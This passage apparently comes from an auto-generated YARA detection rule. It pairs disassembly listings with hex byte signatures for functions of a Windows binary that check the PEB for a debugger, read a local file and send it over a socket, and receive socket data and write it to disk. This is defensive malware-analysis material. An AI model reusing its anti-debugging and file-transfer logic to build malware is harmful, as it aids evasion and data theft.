.text:0x00401c49 7405 jz 0x00401c50 + .text:0x00401c4b e8b0f3ffff call 0x00401000 ;sub_00401000() + .text:0x00401c50 loc_00401c50: [1 XREFS] + .text:0x00401c50 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c56 8b4018 mov eax,dword [eax + 24] + .text:0x00401c59 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401c5d 8945f8 mov dword [ebp - 8],eax + .text:0x00401c60 837df800 cmp dword [ebp - 8],0 + .text:0x00401c64 7405 jz 0x00401c6b + .text:0x00401c66 e895f3ffff call 0x00401000 ;sub_00401000() + .text:0x00401c6b loc_00401c6b: [1 XREFS] + .text:0x00401c6b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c71 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401c75 83e870 sub eax,112 + .text:0x00401c78 8945f4 mov dword [ebp - 12],eax + .text:0x00401c7b 837df400 cmp dword [ebp - 12],0 + .text:0x00401c7f 7505 jnz 0x00401c86 + .text:0x00401c81 e87af3ffff call 0x00401000 ;sub_00401000() + .text:0x00401c86 loc_00401c86: [1 XREFS] + .text:0x00401c86 6a01 push 1 + .text:0x00401c88 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401c8b 8b11 mov edx,dword [ecx] + .text:0x00401c8d 52 push edx + .text:0x00401c8e ff1540b14000 call dword [0x0040b140] ;ws2_32.shutdown(0x61616161,1) + .text:0x00401c94 83f8ff cmp eax,0xffffffff + .text:0x00401c97 7519 jnz 0x00401cb2 + .text:0x00401c99 8b4508 mov eax,dword [ebp + 8] + .text:0x00401c9c 8b08 mov ecx,dword [eax] + .text:0x00401c9e 51 push ecx + .text:0x00401c9f ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401ca5 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401cab b801000000 mov eax,1 + .text:0x00401cb0 eb14 jmp 0x00401cc6 + .text:0x00401cb2 loc_00401cb2: [1 XREFS] + .text:0x00401cb2 8b5508 mov edx,dword [ebp + 8] + .text:0x00401cb5 8b02 mov eax,dword [edx] + .text:0x00401cb7 50 push eax + .text:0x00401cb8 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401cbe ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + 
.text:0x00401cc4 33c0 xor eax,eax + .text:0x00401cc6 loc_00401cc6: [1 XREFS] + .text:0x00401cc6 5f pop edi + .text:0x00401cc7 5e pop esi + .text:0x00401cc8 5b pop ebx + .text:0x00401cc9 8be5 mov esp,ebp + .text:0x00401ccb 5d pop ebp + .text:0x00401ccc c3 ret + */ + $c31 = { 55 8B EC 83 EC 0C 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 01 8B 4D ?? 8B 11 52 FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 8B 45 ?? 8B 08 51 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 55 ?? 8B 02 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401cd0@7faafc7e4a5c736ebfee6abbbc812d80 with 3 features: + - check for PEB NtGlobalFlag flag + - send data + - send data on socket + .text:0x00401cd0 + .text:0x00401cd0 FUNC: int cdecl sub_00401cd0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401cd0 + .text:0x00401cd0 Stack Variables: (offset from initial top of stack) + .text:0x00401cd0 12: int arg2 + .text:0x00401cd0 8: int arg1 + .text:0x00401cd0 4: int arg0 + .text:0x00401cd0 -8: int local8 + .text:0x00401cd0 -12: int local12 + .text:0x00401cd0 -524: int local524 + .text:0x00401cd0 -528: int local528 + .text:0x00401cd0 -532: int local532 + .text:0x00401cd0 -536: int local536 + .text:0x00401cd0 -540: int local540 + .text:0x00401cd0 -544: int local544 + .text:0x00401cd0 + .text:0x00401cd0 55 push ebp + .text:0x00401cd1 8bec mov ebp,esp + .text:0x00401cd3 81ec1c020000 sub esp,540 + .text:0x00401cd9 53 push ebx + .text:0x00401cda 56 push esi + .text:0x00401cdb 57 push edi + .text:0x00401cdc c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401ce3 c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00401ced c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401cf7 64a130000000 fs: mov eax,dword 
[0x00000030] + .text:0x00401cfd 8a5802 mov bl,byte [eax + 2] + .text:0x00401d00 889decfdffff mov byte [ebp - 532],bl + .text:0x00401d06 0fbe85ecfdffff movsx eax,byte [ebp - 532] + .text:0x00401d0d 85c0 test eax,eax + .text:0x00401d0f 7405 jz 0x00401d16 + .text:0x00401d11 e8eaf2ffff call 0x00401000 ;sub_00401000() + .text:0x00401d16 loc_00401d16: [1 XREFS] + .text:0x00401d16 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401d1c 8b4018 mov eax,dword [eax + 24] + .text:0x00401d1f 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401d23 8985e8fdffff mov dword [ebp - 536],eax + .text:0x00401d29 83bde8fdffff00 cmp dword [ebp - 536],0 + .text:0x00401d30 7405 jz 0x00401d37 + .text:0x00401d32 e8c9f2ffff call 0x00401000 ;sub_00401000() + .text:0x00401d37 loc_00401d37: [1 XREFS] + .text:0x00401d37 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401d3d 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401d41 83e870 sub eax,112 + .text:0x00401d44 8985e4fdffff mov dword [ebp - 540],eax + .text:0x00401d4a 83bde4fdffff00 cmp dword [ebp - 540],0 + .text:0x00401d51 7505 jnz 0x00401d58 + .text:0x00401d53 e8a8f2ffff call 0x00401000 ;sub_00401000() + .text:0x00401d58 loc_00401d58: [1 XREFS] + .text:0x00401d58 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00401d5b 51 push ecx + .text:0x00401d5c 8b5508 mov edx,dword [ebp + 8] + .text:0x00401d5f 52 push edx + .text:0x00401d60 8d45fc lea eax,dword [ebp - 4] + .text:0x00401d63 50 push eax + .text:0x00401d64 e847fdffff call 0x00401ab0 ;sub_00401ab0(local8,arg0,arg1) + .text:0x00401d69 83c40c add esp,12 + .text:0x00401d6c 85c0 test eax,eax + .text:0x00401d6e 740a jz 0x00401d7a + .text:0x00401d70 b801000000 mov eax,1 + .text:0x00401d75 e9a0000000 jmp 0x00401e1a + .text:0x00401d7a loc_00401d7a: [2 XREFS] + .text:0x00401d7a c785f4fdffff0000 mov dword [ebp - 524],0 + .text:0x00401d84 8b4d10 mov ecx,dword [ebp + 16] + .text:0x00401d87 51 push ecx + .text:0x00401d88 6800020000 push 512 + .text:0x00401d8d 6a01 push 1 + .text:0x00401d8f 
8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401d95 52 push edx + .text:0x00401d96 e89a1c0000 call 0x00403a35 ;?(local524,1,512,arg2) + .text:0x00401d9b 83c410 add esp,16 + .text:0x00401d9e 8945f8 mov dword [ebp - 8],eax + .text:0x00401da1 loc_00401da1: [1 XREFS] + .text:0x00401da1 6a00 push 0 + .text:0x00401da3 8b45f8 mov eax,dword [ebp - 8] + .text:0x00401da6 50 push eax + .text:0x00401da7 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x00401dad 51 push ecx + .text:0x00401dae 8b55fc mov edx,dword [ebp - 4] + .text:0x00401db1 52 push edx + .text:0x00401db2 ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,sub_00403a35(local524,1,512,arg2),0) + .text:0x00401db8 8985f0fdffff mov dword [ebp - 528],eax + .text:0x00401dbe 83bdf0fdffffff cmp dword [ebp - 528],0xffffffff + .text:0x00401dc5 7513 jnz 0x00401dda + .text:0x00401dc7 8d45fc lea eax,dword [ebp - 4] + .text:0x00401dca 50 push eax + .text:0x00401dcb e850feffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401dd0 83c404 add esp,4 + .text:0x00401dd3 b801000000 mov eax,1 + .text:0x00401dd8 eb40 jmp 0x00401e1a + .text:0x00401dda loc_00401dda: [1 XREFS] + .text:0x00401dda 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00401de0 038df0fdffff add ecx,dword [ebp - 528] + .text:0x00401de6 898df4fdffff mov dword [ebp - 524],ecx + .text:0x00401dec 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x00401df2 3b55f8 cmp edx,dword [ebp - 8] + .text:0x00401df5 72aa jc 0x00401da1 + .text:0x00401df7 837df800 cmp dword [ebp - 8],0 + .text:0x00401dfb 0f8779ffffff ja 0x00401d7a + .text:0x00401e01 8d45fc lea eax,dword [ebp - 4] + .text:0x00401e04 50 push eax + .text:0x00401e05 e816feffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401e0a 83c404 add esp,4 + .text:0x00401e0d 85c0 test eax,eax + .text:0x00401e0f 7407 jz 0x00401e18 + .text:0x00401e11 b801000000 mov eax,1 + .text:0x00401e16 eb02 jmp 0x00401e1a + .text:0x00401e18 loc_00401e18: [1 XREFS] + .text:0x00401e18 33c0 xor eax,eax + .text:0x00401e1a 
loc_00401e1a: [3 XREFS] + .text:0x00401e1a 5f pop edi + .text:0x00401e1b 5e pop esi + .text:0x00401e1c 5b pop ebx + .text:0x00401e1d 8be5 mov esp,ebp + .text:0x00401e1f 5d pop ebp + .text:0x00401e20 c3 ret + */ + $c32 = { 55 8B EC 81 EC 1C 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 8B 4D ?? 51 68 00 02 00 00 6A 01 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 10 89 45 ?? 6A 00 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 8B 8D ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 55 ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 
33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401e30@7faafc7e4a5c736ebfee6abbbc812d80 with 5 features: + - check for PEB NtGlobalFlag flag + - read and send data from client to server + - read file on Windows + - send data + - send data on socket + .text:0x00401e30 + .text:0x00401e30 FUNC: int cdecl sub_00401e30( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401e30 + .text:0x00401e30 Stack Variables: (offset from initial top of stack) + .text:0x00401e30 12: int arg2 + .text:0x00401e30 8: int arg1 + .text:0x00401e30 4: int arg0 + .text:0x00401e30 -8: int local8 + .text:0x00401e30 -12: int local12 + .text:0x00401e30 -524: int local524 + .text:0x00401e30 -528: int local528 + .text:0x00401e30 -532: int local532 + .text:0x00401e30 -536: int local536 + .text:0x00401e30 -540: int local540 + .text:0x00401e30 -544: int local544 + .text:0x00401e30 -548: int local548 + .text:0x00401e30 + .text:0x00401e30 55 push ebp + .text:0x00401e31 8bec mov ebp,esp + .text:0x00401e33 81ec20020000 sub esp,544 + .text:0x00401e39 53 push ebx + .text:0x00401e3a 56 push esi + .text:0x00401e3b 57 push edi + .text:0x00401e3c c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401e43 c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401e4d c785e0fdffff0000 mov dword [ebp - 544],0 + .text:0x00401e57 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e5d 8a5802 mov bl,byte [eax + 2] + .text:0x00401e60 889de8fdffff mov byte [ebp - 536],bl + .text:0x00401e66 0fbe85e8fdffff movsx eax,byte [ebp - 536] + .text:0x00401e6d 85c0 test eax,eax + .text:0x00401e6f 7405 jz 0x00401e76 + .text:0x00401e71 e88af1ffff call 0x00401000 ;sub_00401000() + .text:0x00401e76 loc_00401e76: [1 XREFS] + .text:0x00401e76 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e7c 8b4018 mov eax,dword [eax + 24] + .text:0x00401e7f 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401e83 8985e4fdffff mov dword [ebp - 540],eax + .text:0x00401e89 83bde4fdffff00 cmp dword [ebp - 540],0 + .text:0x00401e90 7405 
jz 0x00401e97 + .text:0x00401e92 e869f1ffff call 0x00401000 ;sub_00401000() + .text:0x00401e97 loc_00401e97: [1 XREFS] + .text:0x00401e97 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e9d 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401ea1 83e870 sub eax,112 + .text:0x00401ea4 8985e0fdffff mov dword [ebp - 544],eax + .text:0x00401eaa 83bde0fdffff00 cmp dword [ebp - 544],0 + .text:0x00401eb1 7505 jnz 0x00401eb8 + .text:0x00401eb3 e848f1ffff call 0x00401000 ;sub_00401000() + .text:0x00401eb8 loc_00401eb8: [1 XREFS] + .text:0x00401eb8 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00401ebb 51 push ecx + .text:0x00401ebc 8b5508 mov edx,dword [ebp + 8] + .text:0x00401ebf 52 push edx + .text:0x00401ec0 8d45fc lea eax,dword [ebp - 4] + .text:0x00401ec3 50 push eax + .text:0x00401ec4 e8e7fbffff call 0x00401ab0 ;sub_00401ab0(local8,arg0,arg1) + .text:0x00401ec9 83c40c add esp,12 + .text:0x00401ecc 85c0 test eax,eax + .text:0x00401ece 740a jz 0x00401eda + .text:0x00401ed0 b801000000 mov eax,1 + .text:0x00401ed5 e936010000 jmp 0x00402010 + .text:0x00401eda loc_00401eda: [1 XREFS] + .text:0x00401eda 6a00 push 0 + .text:0x00401edc 6880000000 push 128 + .text:0x00401ee1 6a03 push 3 + .text:0x00401ee3 6a00 push 0 + .text:0x00401ee5 6a01 push 1 + .text:0x00401ee7 6800000080 push 0x80000000 + .text:0x00401eec 8b4d10 mov ecx,dword [ebp + 16] + .text:0x00401eef 51 push ecx + .text:0x00401ef0 ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0) + .text:0x00401ef6 8985f4fdffff mov dword [ebp - 524],eax + .text:0x00401efc 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x00401f03 7516 jnz 0x00401f1b + .text:0x00401f05 8d55fc lea edx,dword [ebp - 4] + .text:0x00401f08 52 push edx + .text:0x00401f09 e812fdffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401f0e 83c404 add esp,4 + .text:0x00401f11 b801000000 mov eax,1 + .text:0x00401f16 e9f5000000 jmp 0x00402010 + .text:0x00401f1b loc_00401f1b: [2 XREFS] + .text:0x00401f1b 
c785f0fdffff0000 mov dword [ebp - 528],0 + .text:0x00401f25 6a00 push 0 + .text:0x00401f27 8d45f8 lea eax,dword [ebp - 8] + .text:0x00401f2a 50 push eax + .text:0x00401f2b 6800020000 push 512 + .text:0x00401f30 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x00401f36 51 push ecx + .text:0x00401f37 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x00401f3d 52 push edx + .text:0x00401f3e ff1540b04000 call dword [0x0040b040] ;kernel32.ReadFile(kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0),local524,512,local12,0) + .text:0x00401f44 85c0 test eax,eax + .text:0x00401f46 7535 jnz 0x00401f7d + .text:0x00401f48 ff1544b04000 call dword [0x0040b044] ;ntdll.RtlGetLastWin32Error() + .text:0x00401f4e 83f826 cmp eax,38 + .text:0x00401f51 7423 jz 0x00401f76 + .text:0x00401f53 8d45fc lea eax,dword [ebp - 4] + .text:0x00401f56 50 push eax + .text:0x00401f57 e8c4fcffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401f5c 83c404 add esp,4 + .text:0x00401f5f 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00401f65 51 push ecx + .text:0x00401f66 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401ef0>) + .text:0x00401f6c b801000000 mov eax,1 + .text:0x00401f71 e99a000000 jmp 0x00402010 + .text:0x00401f76 loc_00401f76: [1 XREFS] + .text:0x00401f76 c745f800000000 mov dword [ebp - 8],0 + .text:0x00401f7d loc_00401f7d: [2 XREFS] + .text:0x00401f7d 6a00 push 0 + .text:0x00401f7f 8b55f8 mov edx,dword [ebp - 8] + .text:0x00401f82 52 push edx + .text:0x00401f83 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00401f89 50 push eax + .text:0x00401f8a 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401f8d 51 push ecx + .text:0x00401f8e ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,0xfefefefe,0) + .text:0x00401f94 8985ecfdffff mov dword [ebp - 532],eax + .text:0x00401f9a 83bdecfdffffff cmp dword [ebp - 532],0xffffffff + .text:0x00401fa1 7520 jnz 0x00401fc3 + .text:0x00401fa3 8d55fc lea edx,dword [ebp - 4] + .text:0x00401fa6 52 push edx + .text:0x00401fa7 e874fcffff 
call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401fac 83c404 add esp,4 + .text:0x00401faf 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401fb5 50 push eax + .text:0x00401fb6 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401ef0>) + .text:0x00401fbc b801000000 mov eax,1 + .text:0x00401fc1 eb4d jmp 0x00402010 + .text:0x00401fc3 loc_00401fc3: [1 XREFS] + .text:0x00401fc3 8b8df0fdffff mov ecx,dword [ebp - 528] + .text:0x00401fc9 038decfdffff add ecx,dword [ebp - 532] + .text:0x00401fcf 898df0fdffff mov dword [ebp - 528],ecx + .text:0x00401fd5 8b95f0fdffff mov edx,dword [ebp - 528] + .text:0x00401fdb 3b55f8 cmp edx,dword [ebp - 8] + .text:0x00401fde 729d jc 0x00401f7d + .text:0x00401fe0 837df800 cmp dword [ebp - 8],0 + .text:0x00401fe4 0f8731ffffff ja 0x00401f1b + .text:0x00401fea 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401ff0 50 push eax + .text:0x00401ff1 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401ef0>) + .text:0x00401ff7 8d4dfc lea ecx,dword [ebp - 4] + .text:0x00401ffa 51 push ecx + .text:0x00401ffb e820fcffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00402000 83c404 add esp,4 + .text:0x00402003 85c0 test eax,eax + .text:0x00402005 7407 jz 0x0040200e + .text:0x00402007 b801000000 mov eax,1 + .text:0x0040200c eb02 jmp 0x00402010 + .text:0x0040200e loc_0040200e: [1 XREFS] + .text:0x0040200e 33c0 xor eax,eax + .text:0x00402010 loc_00402010: [5 XREFS] + .text:0x00402010 5f pop edi + .text:0x00402011 5e pop esi + .text:0x00402012 5b pop ebx + .text:0x00402013 8be5 mov esp,ebp + .text:0x00402015 5d pop ebp + .text:0x00402016 c3 ret + */ + $c33 = { 55 8B EC 81 EC 20 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 
83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 6A 00 8D 45 ?? 50 68 00 02 00 00 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 83 F8 26 74 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 6A 00 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 8D ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 55 ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 
33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402020@7faafc7e4a5c736ebfee6abbbc812d80 with 5 features: + - check for PEB NtGlobalFlag flag + - receive and write data from server to client + - receive data + - receive data on socket + - write file on Windows + .text:0x00402020 + .text:0x00402020 FUNC: int cdecl sub_00402020( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00402020 + .text:0x00402020 Stack Variables: (offset from initial top of stack) + .text:0x00402020 12: int arg2 + .text:0x00402020 8: int arg1 + .text:0x00402020 4: int arg0 + .text:0x00402020 -8: int local8 + .text:0x00402020 -12: int local12 + .text:0x00402020 -524: int local524 + .text:0x00402020 -528: int local528 + .text:0x00402020 -532: int local532 + .text:0x00402020 -536: int local536 + .text:0x00402020 -540: int local540 + .text:0x00402020 + .text:0x00402020 55 push ebp + .text:0x00402021 8bec mov ebp,esp + .text:0x00402023 81ec18020000 sub esp,536 + .text:0x00402029 53 push ebx + .text:0x0040202a 56 push esi + .text:0x0040202b 57 push edi + .text:0x0040202c c745f800000000 mov dword [ebp - 8],0 + .text:0x00402033 c785ecfdffff0000 mov dword [ebp - 532],0 + .text:0x0040203d c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00402047 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040204d 8a5802 mov bl,byte [eax + 2] + .text:0x00402050 889df0fdffff mov byte [ebp - 528],bl + .text:0x00402056 0fbe85f0fdffff movsx eax,byte [ebp - 528] + .text:0x0040205d 85c0 test eax,eax + .text:0x0040205f 7405 jz 0x00402066 + .text:0x00402061 e89aefffff call 0x00401000 ;sub_00401000() + .text:0x00402066 loc_00402066: [1 XREFS] + .text:0x00402066 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040206c 8b4018 mov eax,dword [eax + 24] + .text:0x0040206f 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402073 8985ecfdffff mov dword [ebp - 532],eax + .text:0x00402079 83bdecfdffff00 cmp dword [ebp - 532],0 + .text:0x00402080 7405 jz 0x00402087 + .text:0x00402082 e879efffff call 0x00401000 
;sub_00401000() + .text:0x00402087 loc_00402087: [1 XREFS] + .text:0x00402087 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040208d 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402091 83e870 sub eax,112 + .text:0x00402094 8985e8fdffff mov dword [ebp - 536],eax + .text:0x0040209a 83bde8fdffff00 cmp dword [ebp - 536],0 + .text:0x004020a1 7505 jnz 0x004020a8 + .text:0x004020a3 e858efffff call 0x00401000 ;sub_00401000() + .text:0x004020a8 loc_004020a8: [1 XREFS] + .text:0x004020a8 8b4d0c mov ecx,dword [ebp + 12] + .text:0x004020ab 51 push ecx + .text:0x004020ac 8b5508 mov edx,dword [ebp + 8] + .text:0x004020af 52 push edx + .text:0x004020b0 8d45f8 lea eax,dword [ebp - 8] + .text:0x004020b3 50 push eax + .text:0x004020b4 e8f7f9ffff call 0x00401ab0 ;sub_00401ab0(local12,arg0,arg1) + .text:0x004020b9 83c40c add esp,12 + .text:0x004020bc 85c0 test eax,eax + .text:0x004020be 740a jz 0x004020ca + .text:0x004020c0 b801000000 mov eax,1 + .text:0x004020c5 e9d4000000 jmp 0x0040219e + .text:0x004020ca loc_004020ca: [1 XREFS] + .text:0x004020ca 6a00 push 0 + .text:0x004020cc 6880000000 push 128 + .text:0x004020d1 6a02 push 2 + .text:0x004020d3 6a00 push 0 + .text:0x004020d5 6a02 push 2 + .text:0x004020d7 6800000040 push 0x40000000 + .text:0x004020dc 8b4d10 mov ecx,dword [ebp + 16] + .text:0x004020df 51 push ecx + .text:0x004020e0 ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0) + .text:0x004020e6 8985f4fdffff mov dword [ebp - 524],eax + .text:0x004020ec 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x004020f3 7516 jnz 0x0040210b + .text:0x004020f5 8d55f8 lea edx,dword [ebp - 8] + .text:0x004020f8 52 push edx + .text:0x004020f9 e822fbffff call 0x00401c20 ;sub_00401c20(local12) + .text:0x004020fe 83c404 add esp,4 + .text:0x00402101 b801000000 mov eax,1 + .text:0x00402106 e993000000 jmp 0x0040219e + .text:0x0040210b loc_0040210b: [2 XREFS] + .text:0x0040210b 6a00 push 0 + .text:0x0040210d 6800020000 push 512 + 
.text:0x00402112 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00402118 50 push eax + .text:0x00402119 8b4df8 mov ecx,dword [ebp - 8] + .text:0x0040211c 51 push ecx + .text:0x0040211d ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local524,512) + .text:0x00402123 8945fc mov dword [ebp - 4],eax + .text:0x00402126 6a00 push 0 + .text:0x00402128 6a00 push 0 + .text:0x0040212a 8b55fc mov edx,dword [ebp - 4] + .text:0x0040212d 52 push edx + .text:0x0040212e 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00402134 50 push eax + .text:0x00402135 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x0040213b 51 push ecx + .text:0x0040213c ff153cb04000 call dword [0x0040b03c] ;kernel32.WriteFile(kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0),local524,ws2_32.recv(0,local524,512),0,0) + .text:0x00402142 85c0 test eax,eax + .text:0x00402144 7520 jnz 0x00402166 + .text:0x00402146 8d55f8 lea edx,dword [ebp - 8] + .text:0x00402149 52 push edx + .text:0x0040214a e8d1faffff call 0x00401c20 ;sub_00401c20(local12) + .text:0x0040214f 83c404 add esp,4 + .text:0x00402152 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00402158 50 push eax + .text:0x00402159 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x004020e0>) + .text:0x0040215f b801000000 mov eax,1 + .text:0x00402164 eb38 jmp 0x0040219e + .text:0x00402166 loc_00402166: [1 XREFS] + .text:0x00402166 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040216a 7f9f jg 0x0040210b + .text:0x0040216c 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00402172 51 push ecx + .text:0x00402173 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x004020e0>) + .text:0x00402179 8d55f8 lea edx,dword [ebp - 8] + .text:0x0040217c 52 push edx + .text:0x0040217d e89efaffff call 0x00401c20 